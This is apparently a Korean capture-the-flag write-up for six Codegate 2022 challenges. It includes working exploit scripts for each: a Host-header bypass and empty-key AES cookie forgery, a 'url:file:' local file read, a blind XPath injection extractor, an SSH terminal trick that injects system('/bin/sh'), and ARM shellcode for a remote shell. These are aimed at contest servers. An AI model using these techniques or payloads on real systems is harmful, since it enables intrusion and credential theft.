University Division, imssm99, 3rd (4249 points)

CAFE

bot.py에 admin의 ID/PW가 있어 admin으로 로그인하면 flag를 볼 수 있다.

driver.get('http://3.39.55.38:1929/login')
driver.find_element_by_id('id').send_keys('admin')
driver.find_element_by_id('pw').send_keys('$MiLEYEN4')
driver.find_element_by_id('submit').click()
time.sleep(2)

superbee

func (this *AdminController) AuthKey() {
	encrypted_auth_key, _ := AesEncrypt([]byte(auth_key), []byte(auth_crypt_key))
	this.Ctx.WriteString(hex.EncodeToString(encrypted_auth_key))
}
...
auth_crypt_key, _ = web.AppConfig.String("auth_crypt_key")

auth_crypt_key가 설정되어있지 않아 빈 문자열이다.

...
} else if controllerName == "AdminController" {
    domain := this.Ctx.Input.Domain()

    if domain != "localhost" {
        this.Abort("Not Local")
        return
    }
}
...
func (this *AdminController) AuthKey() {
	encrypted_auth_key, _ := AesEncrypt([]byte(auth_key), []byte(auth_crypt_key))
	this.Ctx.WriteString(hex.EncodeToString(encrypted_auth_key))
}

/admin/authkeyHost: localhost Header를 설정하여 접속하면 encrypted_auth_key를 얻을 수 있다. encrypted_auth_key를 빈 Key로 Decrypt하여 flag를 얻는데 필요한 Cookie를 설정할 수 있었다.

import requests
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import hashlib

url = "http://localhost:1030"

r = requests.get(f"{url}/admin/authkey", headers={"Host": "localhost"})
enc_auth_key = bytes.fromhex(r.text)

admin_id = b"admin"

cipher = AES.new(pad(b"", 16), AES.MODE_CBC, pad(b"", 16))
auth_key = unpad(cipher.decrypt(enc_auth_key), 16)
print(auth_key)

cookies = {}
cookies[hashlib.md5(b"sess").hexdigest()] = hashlib.md5(admin_id + auth_key).hexdigest()

r = requests.get(f"{url}/main/index", cookies=cookies)
print(r.text)

babyFirst

lookupImg Method는 메모 내용의 [] 안의 url을 읽어 그 내용을 base64 encode하여 img src에 출력해준다. URL의 처음에 file:이 있으면 동작하지 않는다. 이를 우회하기 위해 java.net.URL에서 찾은 다음과 같은 코드를 이용했다.

if (spec.regionMatches(true, start, "url:", 0, 4)) {
    start += 4;
}

메모 내용에 [url:file:/flag] 를 쓴 후 읽는다. img src의 값을 base64 decode하여 flag를 획득 할 수 있었다. data:image/jpeg;charset=utf-8;base64,Y29kZWdhdGUyMDIyezg5NTNiZjgzNGZkZGUzNGFlNTE5Mzc5NzVjNzhhODk1ODYzZGUxZTF9Cg==

myblog

XPath xpath = XPathFactory.newInstance().newXPath();
      String title = (String)xpath.evaluate("//article[@idx='" + idx + "']/title/text()", document, XPathConstants.STRING);
      String content = (String)xpath.evaluate("//article[@idx='" + idx + "']/content/text()", document, XPathConstants.STRING);

/blog/read에서 idx 인자에 xpath injection이 가능하다.

RUN echo 'flag=codegate2022{md5(flag)}' >> /usr/local/tomcat/conf/catalina.properties

catalina.properties에 flag가 저장되어 있으므로 system-property(’flag’)를 이용하면 flag를 획득할 수 있다.

Blind Injection으로 flag의 값을 구했다.

import requests
import string

url = "http://3.39.79.180"
uid = "imssm9999"
upw = "asdasdasd"

s = requests.Session()

r = s.post(f"{url}/blog/register", data={"id": uid, "pw": upw})
print(r.text)

r = s.post(f"{url}/blog/login", data={"id":uid, "pw": upw})
print(r.text)

r = s.post(f"{url}/blog/write", data={"title": "OKOKOK", "content": "OKOKOK"})
print(r.text)

def oracle(cond):
    idx = f"0' or {cond} and '1'='1"
    r = s.get(f"{url}/blog/read", params={"idx": idx})
    return "OKOKOK" in r.text

flag_len = 0
for i in range(1, 0x100):
    if oracle(f"string-length(system-property('flag'))={i}"):
        flag_len = i
        break

print(flag_len)

flag = ""
for i in range(flag_len):
    for c in string.printable:
        if oracle(f"substring(system-property('flag'), {i+1}, 1)='{c}'"):
            flag += c
            break
    print(flag)
print(flag)

VIMT

문자를 입력하면 뒤에 랜덤한 문자열이 추가로 생긴다. 바이너리를 분석해보면 set y {n}을 통해 n번째 줄로 이동할 수 있는 기능이 있다. ssh를 통해 접속하는 문제이므로 stty 명령을 통해 columns를 1로 설정하여 한 줄에 한 문자만 쓰이도록 할 수 있다. 이를 이용해 문자를 입력하고, set y {n}으로 입력한 문자의 다음으로 이동하여 원하는 내용을 쓸 수 있다.

from pwn import *

code = """main() { system("/bin/sh"); } //"""
rows = len(code)+10

s = ssh(user="ctf", host="3.38.59.103", port=1234, password="ctf1234_smiley")
p = s.process("/bin/sh")
p.sendlineafter("$ ", f"stty rows {rows} cols 1".encode())
p.sendlineafter("$ ", b"./app")

def rr():
    for i in range(rows-1):
        p.readline()

rr()

for i in range(len(code)):
    p.send(code[i])
    rr()
    p.send("\x1b")
    p.sendlineafter(":", f"set y {i}")

p.send("\x1b")
p.sendlineafter(":", "compile")
p.interactive()

ARVM

if ( run_vm() == -1 )
    exit(-1);
puts("Good! Now Execute Real Machine");
dest = calloc(1u, 0x1000u);
memcpy(dest, *(const void **)(dword_2407C + 8), 0x1000u);
memset(*(void **)(dword_2407C + 8), 0, 0x1000u);
memcpy(*(void **)(dword_2407C + 8), &unk_1346C, 0x34u);
v3 = memcpy((void *)(*(_DWORD *)(dword_2407C + 8) + 52), dest, 0xFCCu);
(*(void (__fastcall **)(void *))(dword_2407C + 8))(v3);

vm을 작동하는 함수가 -1을 반환하지 않으면, 입력한 code를 실행해준다. code의 처음에 0x0이 있다면 그대로 run_vm()이 정상적으로 종료되는 것을 확인할 수 있었다. 그 뒤에 shellcode를 추가하여 shell을 획득할 수 있었다.

from pwn import *

context.arch = "arm"

p = remote("15.165.92.159", 1234)
p.recvline()
p.recvline()

code = b""
code += p32(0)
code += b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78"

p.sendafter(b":> ", code)

def view_code():
    p.sendafter(b":> ", b"2")
    return p.recvuntil(b"1. Run")[:-6]

def run_code():
    p.sendafter(b":> ", b"1")
    p.recvuntil(b"Secret code : ")
    code = p.recvline().strip()
    p.sendlineafter(b":> ", code)

run_code()

p.interactive()